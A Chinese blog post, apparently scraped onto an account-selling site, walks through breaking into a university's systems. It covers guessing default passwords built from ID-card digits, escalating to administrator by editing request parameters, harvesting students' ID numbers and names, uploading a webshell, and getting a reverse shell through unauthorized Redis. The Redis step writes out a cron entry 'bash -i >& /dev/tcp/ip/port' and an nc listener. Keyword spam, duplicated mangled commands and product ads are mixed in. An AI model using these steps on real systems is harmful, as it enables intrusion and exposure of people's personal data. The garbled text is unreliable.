首页 » 谷歌 » 1.挖掘姿势开始那自然是信息收集有账号有漏洞

1.挖掘姿势开始那自然是信息收集有账号有漏洞

 
暂无评论 186次浏览

国外苹果ID/美日韩台、新加坡、香港等——点击购买
韩国区已过年龄认证17+ 19+ 的苹果id游戏应用下载
独享美区ID小火箭账号——购买正版苹果商店礼品卡、软件兑换码
---------------------------------------------------------------------------------
谷歌锁区号/谷歌邮箱老号-购买商城-谷歌PLAY锁区账号/美区、日区,韩区,台区,新加坡谷歌账号等谷歌账号购买、代注册谷歌账号,代申诉解封———>点击购买

1.挖掘姿势

第一阶段开始,自然是信息收集。

有账号进入系统测试,更容易发现漏洞。

所以先找账号,学号很好找,关键是密码,很多学校都是用身份证后六位作为密码,找密码有两种方法:

一种是泄露部分身份证的后几位,然后通过爆破检测密码; 另一个是修复默认密码

举第二个例子

百度语法选择正确的目标站点:。 默认密码很好找。

谷歌窃取用户隐私_谷歌账号可以改用户名吗_一个名可以办多个支付宝账号

您可以进入本系统查看是否有更多信息,以便进一步收集信息。

然后是时候找到国际学生的学号了。 你可以去相关的国际学院找学号或者百度语法网站:国际学生学号也可以加上一些限定词,方便查找和自由发挥。 我用查到的国际学生学号登录系统。

一个名可以办多个支付宝账号_谷歌账号可以改用户名吗_谷歌窃取用户隐私

没有什么有用的信息,但是在url里看到了,想着改一下参数值看看能不能覆盖其他账号的权限,结果果然OK

谷歌窃取用户隐私_一个名可以办多个支付宝账号_谷歌账号可以改用户名吗

收集到的信息变多了,也算是信息泄露+越权,可以登录其他系统看看有没有身份证。 我不会在这里继续。

第二阶段是拥有一个可以登陆的账号,登陆门户进入更多的系统测试。

登录门户后,有很多站点可以测试。 如何测试取决于系统。

我还举了一个用学生权限登录的例子。 进入传送门的时候,我想挖掘一些泄露的信息,看看能不能找到其他账号。

例如,教师或研究生,因为多个研究生系统可以在办公系统的一个部分输入和发送消息以选择对象。 选中的对象好像有全校师生的学号和工号。 乍一看都是学生证,但是按账号排序后出现了大量的身份证和姓名,算是信息泄露。 这样就可以把学号或者工号合并成一个新的账号登录了。

谷歌账号可以改用户名吗_谷歌窃取用户隐私_一个名可以办多个支付宝账号

本来想爆破的,没想到另外一个系统居然有查询人员的功能

一个名可以办多个支付宝账号_谷歌窃取用户隐私_谷歌账号可以改用户名吗

所以通过查询之前得到的老师姓名,可以查到工号

然后把工号和身份证合并成一个新的账号登录,有权限的账号也可以成功登录,没想到竟然有权限登录研究生系统

一个名可以办多个支付宝账号_谷歌账号可以改用户名吗_谷歌窃取用户隐私

点击右上角可以切换角色。 这时候抓包和修改数据可以越权到管理员权限。

一个名可以办多个支付宝账号_谷歌账号可以改用户名吗_谷歌窃取用户隐私

改成1后,发布包后就是管理员了。

一个名可以办多个支付宝账号_谷歌窃取用户隐私_谷歌账号可以改用户名吗

第三阶段登录内网

一开始进入内网,还是信息收集,主要收集网段信息,找存活站点确定网段,可以百度谷歌语言搜索,有时候还是可以找到有用的信息,比如

语法也是 site:。 内网(或以内网网段开头,如192.168)

也可以使用子域名矿机查看子域名,有时会返回内网ip。

如果收集不到网段信息,只能遍历扫描内网网段

确认网段后,可以使用工具扫描C段或B段,扫描的端口看个人习惯和设置,扫描出站点后测试即可。 一些地方的内网安全意识比较薄弱。 一不小心,就有可能出现一些不应该的事情。 如果有漏洞,可以使用一些缺失的扫描工具。

比如goby,顺便说一句谷歌账号可以改用户名吗,goby有个比较方便的功能,可以看站点页面截图

一个名可以办多个支付宝账号_谷歌窃取用户隐私_谷歌账号可以改用户名吗

您可以看到站点的扫描主页是一种什么样的方便选择。

举几个内网遇到的漏洞的例子 1.一种是用goby扫描出一个漏洞,直接上传工具

谷歌窃取用户隐私_谷歌账号可以改用户名吗_一个名可以办多个支付宝账号

权限一上来就是最高权限,目录也出来了。 直接传给哥斯拉

谷歌账号可以改用户名吗_谷歌窃取用户隐私_一个名可以办多个支付宝账号

只是连接

谷歌窃取用户隐私_一个名可以办多个支付宝账号_谷歌账号可以改用户名吗

2.密码重置

发现一个系统

谷歌账号可以改用户名吗_一个名可以办多个支付宝账号_谷歌窃取用户隐私

手动测试了一波弱密码找不到密码,然后注册用户的时候进入admin,显示被占用谷歌账号可以改用户名吗,然后去找回密码看看有没有突破口。 看到找回密码的问题是我的名字

谷歌窃取用户隐私_谷歌账号可以改用户名吗_一个名可以办多个支付宝账号

回到上面的账号验证步骤,输入用户名和验证码开始抓包。 当我把包裹放进下图的包裹里时,看到了一个,然后就发给了重发包裹。

一个名可以办多个支付宝账号_谷歌窃取用户隐私_谷歌账号可以改用户名吗

巧的是,这时候我看到管理员的信息里面有一个,和我一样是拼音小白

一个名可以办多个支付宝账号_谷歌窃取用户隐私_谷歌账号可以改用户名吗

我赶紧写了密保问题然后找回密码,但是结果是重置密码发到邮箱了,于是我又试了下,到了这个包裹,看到Email,就改成我的邮箱了,放了包裹,但是一直没收到 邮件好像不行

一个名可以办多个支付宝账号_谷歌窃取用户隐私_谷歌账号可以改用户名吗

不过想了想,密码重置应该是默认的吧。 然后又试了一个弱密码,发现admin/login成功了。

3、redis非授权定时任务反弹shell

用工具扫描网段的时候看到有一个IP打开了6379端口,立马想到了redis未授权漏洞

赶紧下载一个redis连接工具。 连接后,获取dir并执行。 好像很有趣

连接:redis-cli -h ip获取路径:get dir

谷歌账号可以改用户名吗_一个名可以办多个支付宝账号_谷歌窃取用户隐私

用公网ip监听自己服务器上的端口

nc -lvvnp 8888

对了,一般-lvp是可以的,但是我的阿里云服务器会报错。 百度刚加了一个参数n。

谷歌账号可以改用户名吗_谷歌窃取用户隐私_一个名可以办多个支付宝账号

继续回redis连接,将反弹shell语句写入参数x,x自己设置,然后修改目录为定时任务目录,修改文件名为root并保存

set xx "n* * * * * bash -i >& /dev/tcp/ip/端口 0>&1n" (ip写自己服务器的ip,端口写自己监听的端口)config set dir /var/spool/cron/config set dbfilename rootsave

一个名可以办多个支付宝账号_谷歌账号可以改用户名吗_谷歌窃取用户隐私

大约一分钟后,vps 进入 shell

一个名可以办多个支付宝账号_谷歌账号可以改用户名吗_谷歌窃取用户隐私

做完这个测试,记得把计划好的炸壳任务删掉

crontab -l

可以查看定时任务

crontab -e

可以修改定时任务

我在查看/var/spool/cron/root文件的内容是否只是我写的定时任务


nc -lvvnp 8888set xx "n* * * * * bash -i >& /dev/tcp/ip/端口 0>&1n" (ip写自己服务器的ip,端口写自己监听的端口)config set dir /var/spool/cron/config set dbfilename rootsave

确认无误后,我删除了文件,最后用-l检查了一下

———————————————————————————————————————————————— ——————————————————————————————————————

国外苹果ID/美日韩台、新加坡、香港等——韩国区已过年龄认证17+ 19+ 的苹果id游戏应用下载——独享美区ID小火箭账号-——正版苹果商店礼品卡、软件兑换码点击购买
日本区苹果商店_国外苹果ID/美日韩台新加坡等
谷歌锁区号/谷歌邮箱老号-购买商城-谷歌PLAY锁区账号/美区、日区,韩区,台区,新加坡谷歌账号等谷歌账号购买、代注册谷歌账号,代申诉解封———>点击购买

原文链接:1.挖掘姿势开始那自然是信息收集有账号有漏洞,转载请注明来源!

0